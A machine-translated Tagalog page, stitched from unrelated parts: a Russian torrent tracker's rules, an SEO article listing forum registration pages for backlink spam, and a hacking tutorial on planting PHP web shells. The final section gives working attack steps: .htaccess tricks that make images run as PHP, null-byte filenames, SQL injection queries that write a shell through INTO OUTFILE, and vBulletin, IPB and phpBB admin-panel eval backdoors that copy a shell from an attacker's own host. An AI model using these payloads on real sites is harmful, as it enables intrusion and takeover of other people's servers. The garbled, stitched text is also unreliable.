profile php mode ay materialized. Mga pamamaraan para sa pagpuno ng shell

Mga panuntunan at paghihigpit sa tracker.

1. Pangkalahatang mga probisyon at paghihigpit
1.1. Ang mga panuntunan sa tracker na ito ay hindi mapag-usapan at dapat na walang kundisyon na sundin ng lahat ng naroroon sa tracker. Tanging ang mga Tagapangasiwa ng Tagasubaybay ang pinapayagang hindi sumunod sa ilang mga probisyon ng mga patakaran sa mga pambihirang sitwasyon.
1.2. Ang pangangasiwa ng tracker ay ang tanging at pinakamataas na awtoridad kung saan malulutas ang anumang sitwasyon ng salungatan patungkol sa tracker at mga user nito. Kaya, ang mga desisyon ng mga Administrator ay pinal at hindi maaaring iapela.
1.3. Inilalaan ng administrasyong Tagasubaybay ang karapatan na baguhin at dagdagan ang lahat ng mga sugnay ng mga panuntunang ito nang walang nauna o kasunod na abiso. Ang mga karagdagan at pagbabago sa mga panuntunan ay magkakabisa mula sa sandali ng kanilang paglalathala. Gayunpaman, bilang isang pagkilos ng mabuting kalooban, susubukan ng Administrasyon, hangga't maaari, na dalhin ang mga naturang pagbabago sa atensyon ng mga gumagamit.
1.4. Ang kamangmangan sa mga ito at sa iba pang Mga Panuntunan ng Tagasubaybay ay hindi lamang nakakapag-alis ng responsibilidad sa paglabag sa mga ito, ngunit ito mismo ay isang paglabag at isang nagpapalubha na pangyayari.
1.5. Ipinagbabawal na gumamit ng anumang mga programa upang palsipikado ang data tungkol sa iyong Upload at Download. Ang mga manloloko ay agad na ipinagbabawal.
1.7. Ipinagbabawal ang paggamit ng mga pagkakamali at pagkakamali ng tracker para sa mga personal na layunin. Sa kaso ng pagtuklas ng mga malfunction at error, dapat mong ipaalam sa Tracker Administration.
2. Pagpaparehistro
Ang pagpaparehistro ay isang mahalagang bahagi ng pagiging nasa tracker. Awtomatikong ipinapahiwatig ng pagpaparehistro ang iyong kasunduan sa Mga Panuntunang ito. Kung hindi ka sumasang-ayon sa Mga Panuntunang ito, sumulat sa administrasyon.
2.1. BAWAL ANG REGISTRATION MULA SA IBA'T IBANG FOREIGN PROXY SERVER. Mga lumalabag - instant ban!!!
Sa mga pambihirang kaso, pinapayagan lamang ito pagkatapos ng pagsasaalang-alang ng aplikasyon ng administrasyon.
2.2. BAWAL MAGREHISTRO NG HIGIT SA DALAWANG ACCOUNT MULA SA ISANG COMPUTER. Sa kaso ng paglabag, lahat ng umiiral na account ay pinagbawalan.
Ang pagpaparehistro ng isang bagong account pagkatapos ng umiiral na dalawa ay posible lamang sa pahintulot ng administrasyon.
3. Mga panuntunan para sa pagkomento sa mga kamay
3.1. Ipinagbabawal ang paggamit ng kabastusan sa mga komento sa mga pamamahagi, anumang malalaswang salita at pagpapahayag, mga nakatagong kalaswaan, kabilang ang mga wikang banyaga.
Parusa: Pag-alis ng mga komentong lumalabag sa mga patakaran at pagbabawal sa pagsulat ng mga komento sa loob ng 1 linggo. Ang kasunod na paglabag sa panuntunang ito ay magreresulta sa pagbabawal sa loob ng 7 araw at pagbabawal sa pagsulat ng mga komento sa loob ng 14 na araw. Sa hinaharap, magkakaroon ng permanenteng pagbabawal sa pagsulat ng mga komento.
3.2. Ipinagbabawal na insultuhin ang mga kalahok sa tracker sa anumang anyo. Ipinagbabawal na magpakita ng anumang kabastusan, personal na insulto at malalaswang pahayag sa ibang mga kalahok, na sumisira sa kanilang reputasyon, nakakahiya sa kanilang dangal at dignidad, kabilang ang pampublikong pagpapakita ng mga personal na relasyon, kapwa sa mga personal na mensahe sa tracker at sa mga komento sa mga pamamahagi. Dapat panatilihin ng mga kalahok ang magalang na komunikasyon.
Parusa: Pag-alis ng mga komentong lumalabag sa panuntunan at pagbabawal sa lumabag sa loob ng 7 araw. Ang kasunod na paglabag sa panuntunang ito ay magreresulta sa pagbabawal sa loob ng 7 araw at pagbabawal sa pagsulat ng mga komento sa loob ng 30 araw. Sa hinaharap, magkakaroon ng permanenteng pagbabawal sa pagsulat ng mga komento.
3.3. Ang mga banta sa anumang kalikasan ay ipinagbabawal (virtual, totoo at iba pang mga banta laban sa mga kalahok sa tracker).
Parusa: Pagtanggal ng mga mensahe at pagbabawal sa nagkasala sa loob ng 14 na araw. Kung lalabag muli ang panuntunang ito, maba-ban ka sa loob ng isang buwan.
3.4. Naglalagablab (mga mensaheng wala sa paksa, naglalayong magsimula ng hindi pagkakaunawaan, pati na rin ang pag-personalize ng mga tinatalakay), pagbaha (mga mensaheng hindi tumutugma sa paksa, walang semantic load, o binubuo lamang ng mga emoticon), offtopic (mga mensaheng hindi nauugnay sa paksang tinatalakay) ay ipinagbabawal. , pati na rin ang mga insentibo sa pagbaha, pag-aapoy, offtopic at mga mensahe tulad ng: “Tulong”, “Problema”, “Ano ang pinag-uusapan mo, ha?” o "Kaya hindi ko maintindihan - saan magda-download?" at mga katulad nito, hindi nauugnay sa pamamahagi na ito. Ang isang komento ay maaaring maglaman ng hindi hihigit sa 3 emoticon.
Parusa: Pag-alis ng mga komentong lumalabag sa mga patakaran at babala ng may-akda ng komento sa loob ng 3 araw. Kung lalabag muli ang panuntunang ito, ang may-akda ng komento ay pagbawalan na magsulat ng mga komento sa loob ng 7 araw. Sa hinaharap, para sa bawat paglabag, ang pagbabawal sa pag-iwan ng mga komento ay ibibigay sa loob ng 14 na araw at pagbabawal sa pag-download sa loob ng 14 na araw.
3.5. Ipinagbabawal na mag-post ng mga komersyal na mensahe, direkta o hindi direktang advertising, spam mail at mga link sa mga site na hindi direktang nauugnay sa pamamahagi sa mga komento.
Parusa: Pag-alis ng advertising, pagbabawal sa pagsulat ng mga komento sa loob ng 7 araw at pagbabawal sa pag-download sa loob ng 7 araw. Sa kaso ng paulit-ulit na paglabag, pagbabawal sa pagsulat ng mga komento sa loob ng 15 araw at pagbabawal sa pag-download sa loob ng 15 araw. Sa hinaharap, magkakaroon ng permanenteng pagbabawal sa pagsulat ng mga komento.
3.6. Ipinagbabawal sa mga komento ang pagpapakita ng poot sa lahi, pambansa at relihiyon, upang pukawin ang mga partidong pampulitika, isulong ang terorismo, ekstremismo, droga, relihiyon at iba pang mga paksang hindi tumutugma sa karaniwang tinatanggap na mga batas ng moralidad at disente.
Parusa: Pag-alis ng mga komentong lumalabag sa mga patakaran, pagbabawal sa pagsulat ng mga komento sa loob ng 14 na araw at pagbabawal sa pag-download sa loob ng 14 na araw. Sa kaso ng paulit-ulit na paglabag, pagbabawal sa pagsulat ng mga komento sa loob ng 30 araw at pagbabawal sa pag-download sa loob ng 30 araw. Sa hinaharap, magkakaroon ng permanenteng pagbabawal sa pagsulat ng mga komento.
3.7. Ipinagbabawal na mag-iwan ng mga komento na lantaran o palihim na lumalabag sa Kodigo sa Kriminal ng Russian Federation, pati na rin ang mga mensahe na humihiling ng pagsasagawa ng mga iligal na aksyon.
Parusa: Pagtanggal ng mga mensahe, pagbabawal sa pagsulat ng mga komento sa loob ng 14 na araw at pagbabawal sa pag-download sa loob ng 14 na araw. Sa kaso ng paulit-ulit na paglabag, ang nagkasala ay pinagbawalan sa loob ng 30 araw. Para sa ikatlong paglabag - isang permanenteng pagbabawal.
3.8. Ipinagbabawal sa mga komento sa mga distribusyon na ibunyag ang anumang personal na data ng mga user, kumpidensyal na data, totoong buong pangalan, paglalathala ng mga litrato, pagpapakalat ng impormasyon tungkol sa pribadong buhay ng isang kalahok sa talakayan na bumubuo sa kanyang personal o lihim ng pamilya, nang walang pahintulot niya.
Parusa: Pag-alis ng mga komentong lumalabag sa panuntunan at pasalitang babala sa tagasubaybay. Sa kaso ng paulit-ulit na paglabag, pagbabawal sa pagsulat ng mga komento sa loob ng 7 araw. Sa hinaharap, magkakaroon ng pagbabawal sa pagsulat ng mga komento sa loob ng 30 araw.
3.9. Ipinagbabawal na mag-post sa mga komento ng mga larawang naglalaman ng pornograpiya, mga eksena ng karahasan o anumang iba pang mga larawan na humihiya o nang-insulto sa ibang mga gumagamit.
Parusa: Pagtanggal ng mga komentong lumalabag sa mga patakaran at pagbabawal sa pag-download at pag-iwan ng mga komento sa loob ng 7 araw. Sa kaso ng paulit-ulit na paglabag, ang user ay pinagbawalan sa loob ng 7 araw. Sa hinaharap - isang pagbabawal sa loob ng 15 araw at isang permanenteng pagbabawal sa pagsulat ng mga komento.
3.10. Ipinagbabawal na gumamit ng isang wika maliban sa Russian at isang font maliban sa Cyrillic sa mga komento.
Parusa: Pagtanggal ng mga mensahe at pasalitang babala sa gumagamit; sa kaso ng paulit-ulit na paglabag sa mga patakaran ng talatang ito, pagbabawal sa pagsulat ng mga komento sa loob ng 3 araw.
3.11. Ipinagbabawal na gamitin ang mga sumusunod na paraan ng pag-highlight sa mga mensahe: pula, higit sa 75% malalaking titik at malaking laki ng font - ito ang pribilehiyo ng mga moderator at administrator.
Parusa: Pagtanggal ng mga mensahe at pasalitang babala sa gumagamit; sa kaso ng paulit-ulit na paglabag sa mga patakaran ng talatang ito, pagbabawal sa pagsulat ng mga komento sa loob ng 7 araw.
3.12. Ipinagbabawal ang pag-overquote (pag-quote ng mga mensahe mula sa iba pang kalahok sa dami na lampas sa makatwirang halaga (higit sa 10 linya ng orihinal na mensahe)).
Parusa: Pag-edit ng mensahe at pasalitang babala sa gumagamit; sa kaso ng paulit-ulit na paglabag sa mga patakaran ng talatang ito, pagbabawal sa pagsulat ng mga komento sa loob ng 3 araw.
3.13. Ang mga spoiler ay ipinagbabawal, at pigilin ang paggamit ng mga spoiler (pagbubunyag ng mga pangunahing punto ng plot, ang kaalaman na maaaring makasira sa karanasan sa panonood para sa iba, ang kinalabasan ng laban, atbp.).
Kung hindi mo magagawa nang walang mga spoiler, dapat mong isama ang spoiler sa tag na [expand] at ilagay ang markang "Spoiler" sa harap nito.
Tandaan: Sa mga pamamahagi ng "sports" ay ipinagbabawal na sirain ang hanggang 11 komento (1 pahina).
Parusa: Pag-edit ng mensahe at pasalitang babala sa gumagamit. Kung paulit-ulit mong nilalabag ang mga alituntunin ng talatang ito, ikaw ay pagbabawalan na magsulat ng mga komento sa loob ng 3 araw.
3.14. Ipinagbabawal na mag-publish ng mga mensaheng naglalaman ng sadyang maling impormasyon.
Parusa: Pag-alis ng mga komentong lumalabag sa panuntunan at pasalitang babala sa gumagamit. Kung paulit-ulit mong nilalabag ang mga alituntunin ng talatang ito, ikaw ay pagbabawalan na mag-iwan ng mga komento sa loob ng 7 araw.
Ang torrent comment system ay idinisenyo upang:
- Ipahayag ang iyong paggalang at pasasalamat sa nagbigay,
- Magtanong ng isang partikular na tanong na interesado ka tungkol sa pamamahagi,
- Magbigay ng kawili-wiling impormasyon na may kaugnayan sa giveaway.
4. Mga paghihigpit sa mga avatar at lagda:
4.1. Lagda:
- Pinakamataas na taas: 100 pts (sa madaling salita, hindi hihigit sa apat na userbar o sampung linya ng text (laki ng font 10); lapad: 750 pts.
- Ang kabuuang bigat ng mga larawang nakapaloob sa lagda ay hindi dapat lumampas sa 200 Kb.
- Nilalaman: karahasan, pagbabanta (sa demograpiko, pambansa, relihiyoso o politikal na batayan), mabahong pananalita (kabastusan, pagtawag sa pangalan, kabastusan, atbp.), karahasan (pornograpiya), diskriminasyon sa anumang anyo, mga teksto at larawan ng advertising o Ang komersyal ay hindi katanggap-tanggap na karakter, imitasyon ng mga pamagat/ranggo ng mapagkukunang ito, pati na rin ang mga mapanuksong larawan, kasama. gamit ang mga simbolo ng Nazi.
- Animation: ipinagbabawal ang mga caption na malakas na kumikislap (ang antas ng pagkurap ay tinutukoy ng administrasyon).
- Ang lagda sa ilalim ng iyong mga mensahe ay hindi maaaring gamitin upang lumikha ng mga link sa anumang mapagkukunan ng network. (Ang mga pagbubukod ay mga link sa mga site na may mga userbar, mga serbisyo tulad ng youtube, google, atbp.)
4.2. Avatar:
- Pinakamataas na laki: 100x100 pixels; timbang: hanggang 21 KB.
- Nilalaman: karahasan, pagbabanta (sa demograpiko, pambansa, relihiyoso o politikal na batayan), mabahong pananalita (kabastusan, pagtawag sa pangalan, kabastusan, atbp.), karahasan (pornograpiya), diskriminasyon sa anumang anyo, propaganda sa droga, komersyal na advertising at mga teksto sa advertising, imitasyon ng mga pamagat/ranggo ng mapagkukunang ito, sinadyang pagkakatulad sa mga avatar ng mga miyembro ng administrasyon, pati na rin ang mga mapanuksong larawan, kasama. gamit ang mga simbolo ng Nazi.
- Animation: ipinagbabawal ang malakas na kumikislap na mga avatar (ang antas ng pagkurap ay tinutukoy ng administrasyon).
Parusa: Pag-aalis ng lagda at avatar, o pagbabawal sa paggamit ng mga ito (na tinutukoy ng administrator).
5. Pagpapalabas
5.1. Ipinagbabawal ang muling pag-upload ng mga release sa ibang mga tagasubaybay nang walang personal na pahintulot ng naglabas. Ang pagsuporta sa pamamahagi ng isang release na ipinagbabawal sa muling pag-upload sa isa pang tracker ay katumbas ng isang independiyenteng muling pag-upload at pinarurusahan alinsunod sa sugnay 7.
6. Iba pa
6.1. Ipinagbabawal ang pag-upload ng mga nilalaman ng mga pamamahagi gamit ang mga serbisyo sa pagho-host ng file tulad ng vip-file, letitbit at iba pa...
6.2. Ipinagbabawal na gumamit ng anumang mga download manager upang mag-download ng mga torrents.
7. Parusa:
Para sa mga paglabag na tinukoy sa mga talata 5-6 - isang pagbabawal sa loob ng 7 araw. Ang paulit-ulit na paglabag sa mga panuntunang ito ay magreresulta sa isang panghabambuhay na pagbabawal.

Kaya, sa palagay ko hindi ko sorpresahin ang sinuman sa pagsasabing mas maraming panlabas na link sa iyong site, mas malaki ang TCI nito at mas malaki ang TCI ng nagre-refer na site, mas malaki ang "bigat" ng link na ito. Mayroong maraming mga paraan upang madagdagan ang masa ng link sa iyong site, ngunit ngayon ay pag-uusapan ko lamang ang tungkol sa isa sa mga ito - pagkuha ng mga panlabas na link mula sa mga trust site.
Sa artikulong ito, hindi ko ibibigay ang lahat ng mga link sa trust sites, na alam ko, ngunit sasabihin ko lang sa iyo ang tungkol sa isa sa kanila - mga forum.
Sa pamamagitan ng pagrehistro sa mga forum kung saan maaari mong tukuyin ang isang website (Bilang isang panuntunan, sila ay ginawa sa parehong engine), makakatanggap ka ng isang panlabas na link.
Upang gawing malinaw kung ano ang pinag-uusapan natin, tingnan ang screenshot sa ibaba:

Iyon ay, kailangan mo lamang magrehistro sa naturang forum, na nagpapahiwatig ng site. Iyon lang. (Well, sa karamihan, kailangan mo pa ring kumpirmahin ang iyong pagpaparehistro, kaya ipahiwatig ang iyong tunay na e-mail). Karaniwan, magiging ganito ang hitsura ng isang page na may link sa iyong site:

Ngayon pag-usapan natin ang mga kawalan ng pamamaraang ito, sa palagay ko mayroong dalawa sa kanila:
1) Sa tingin ko, maaga o huli ay aalisin ka sa forum dahil sa kawalan ng aktibidad (Ngunit sa prinsipyo, hindi ito magiging mahirap na magrehistro muli).
2) Alinsunod dito, imposibleng magtakda ng isang link anchor. (Ito ay marahil hindi kahit isang minus, ngunit isang katotohanan, ngunit pa rin).
Well, ngayon listahan ng mga matabang forum. Para sa kaginhawahan, sa pababang pagkakasunud-sunod ng TCI:
Link (TCI)
http://forum.igromania.ru/register.php (1700) [Magrehistro, pagkatapos ay ipahiwatig ang site sa iyong profile, i-save]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Isaad ang website sa iyong profile]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)

http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [Sa profile]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [Sa profile]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________

Ang huling pag-update sa database ay 06/16/11(Ang listahan ay na-clear na sa mga sirang link + ilan pang mga site ang naidagdag na nasa ibaba ng linya)

Gayundin, salamat sa isang site ng pagtitiwala, hindi mo lamang mapataas ang TIC, ngunit mapataas din ang trapiko sa site! Ngunit para dito kailangan mo ng maraming mahusay na mga site ng tiwala, at sila, bilang panuntunan, ay naibenta na para sa pera. Buweno, magpasya para sa iyong sarili kung bibilhin ang mga ito o hindi...

Sa konklusyon, maaari kong sabihin na huwag magrehistro nang sabay-sabay, sa lahat ng mga forum nang sabay-sabay, kung hindi man ang iyong site ay maaaring mahulog sa ilalim ng ilang uri ng filter. 5-8 sa isang araw ay sapat na sa aking palagay. Lahat. Good luck. 😉

Pansin!
Sinusulat ko ang talang ito noong 2015 at gusto kong sabihin na ngayon, sa aking opinyon, nag-iiwan ng mga link sa iyong blog (site) sa mga ito o sa iba pang mas bagong trust sites, mag-aaksaya ka lang ng oras. Samakatuwid, upang maiwasan ang paulit-ulit na mga tanong sa mga komento, magsusulat ako dito - walang mga update sa listahang ito.
Mas mainam kong inirerekumenda na tingnan ang aking listahan. Siyempre, ang pag-post ng mga mensahe sa naturang mga blog ay hindi rin kasing epektibo ng dati, ngunit, muli, sa aking subjective na opinyon, ito ay maraming beses na mas epektibo.

Kamusta %username% at ang kanyang mga kaibigan. Buweno, kailangan mong agad na mag-upload ng isang shell sa site, mabuti, hindi mo alam, marahil ang huling bayad ay nakasalalay dito. Well, hindi lang ito gumagana. Dito nakolekta ko ang ilang mga halimbawa (salamat kay Tracy at iba pa para dito).

Ibuhos natin ang shell sa pamamagitan ng larawan

Na-hack mo ang isang site (siyempre nagsusubok ka lang) gamit ang custom na admin panel... At hindi ka makakapag-upload ng web shell, ngunit mayroong upload ng mga larawan at naglo-load lamang ng mga format na .jpg, .gif, .png.
Ano ang maaaring gawin sa kasong ito?

Itinulak namin ang shell na may extension na .gif sa ilang folder na may mga larawan, at lumikha ng .htaccess file na may mga nilalaman

AddType application/x-httpd-php .gif
Ipapatupad ng command na ito ang .gif na format bilang php
Sinusubukang buksan ang /shell.gif

Gayundin, kung ang script ay walang malasakit sa mga line break, sinusubukan naming bahain ang shell, sabay-sabay na pinapalitan ang pangalan nito sa shell.php%00.jpg, tingnan ang pagkakaroon ng shell.php, paano kung?

Paraan para sa paglo-load ng shell sa pamamagitan ng mysql.user mula sa whine

1) Alamin natin kung sino ang ating inuupuan at alamin din ang kanyang mga karapatan sa mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Alamin natin kung sino ang inuupuan natin)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" aming gumagamit "+--+
(Suriin natin ang mga pribilehiyo ng aming user. Kung ito ay nagbibigay ng error sa panahon ng output, maaari mong hex ang aming user 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Path sa file "+--+
(Punan ang mini-shell)
P.S.
Para gumana ang lahat, kailangan mong magkaroon ng mga karapatan sa pagsulat at malaman ang buong landas patungo sa ugat.
Maaari mo ring suriin ang mga pahintulot sa pagsulat tulad nito:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+mula sa+mysql.user+--+
Kung ang prava ay ipinapakita, kung gayon mayroon kang mga karapatan.

Ang sumusunod na sitwasyon. Kami ay nasa admin panel ng vBulletin forum engine

Tara na:
Mga Plugin at Produkto -> Plugin Manager -> Mga Plugin at Produkto -> Plugin Manager -> [Magdagdag ng Bagong Plugin]

Pumili ng mga template. Karaniwang pinipili namin ang faq_complete, piliin at i-click ang Plugin ay Active na checkbox, itakda ito sa "Oo" at i-save.

localhost/forum/faq.php?cmd=phpinfo();

Kung nag-print kami ng phpinfo() pagkatapos ay isaalang-alang ang shell sa aming mga kamay.

Susunod sa phpinfo kailangan mong hanapin ang buong landas sa forum (halimbawa /home/u0000/site.ru/www/sell.php). Susunod, kailangan nating gawing txt file ang aming web shell at i-upload ito sa anumang website
mysite.com/shell.txt
Punan ang shell ng command

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Ano ang ginagawa ng pangkat na ito? Kinokopya nito ang mga nilalaman ng variable [a] sa variable [b], iyon ay, ang shell.txt ay kinopya sa shell.php

Nilo-load ang shell sa IPB 3

Tara na:
Suporta->SQL Management->Running Processes->Run New Query

Code:
piliin ang 0x3c3f706870696e666f28293b3f3e sa outfile na "Z:/home/site.ru/www/uploads/shell.php"
Maaari mong makita ang buong landas tulad nito:

Admin->Suporta
Magkakaroon ng bersyon ng PHP na nakasulat sa itaas at isang link sa PHPINFO sa kaliwa.

Shell dito:
http://site.com/uploads/shell.php

Pag-upload ng shell sa phpBB 2

1. Lumikha ng ex.sql file
2. Magrehistro doon

I-UPDATE ang phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Kung saan ang user_id=2 ay ang administrator ID

3. Pumunta sa admin panel
4. Sa admin panel, piliin ang item na "Ibalik ang DB" at i-download ang ex.sql
5. Ipatupad ang code / Punan ang shell tulad nito

Tara na:
http://target/profile.php?mode=editprofile&e=phpinfo();
Pagkatapos:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
Upang ipakita ang phpinfo() kailangan mong naka-log in.

Ito ay isang maikling listahan lamang ng kung paano at kung aling mga makina ang maaaring i-load ang shell. Kailangan pa? Maligayang pagdating sa mga lalaki sa rdot
pag-upload sa mga forum
pagpuno sa cms
At narito ang aking paboritong shell, din sa rdot))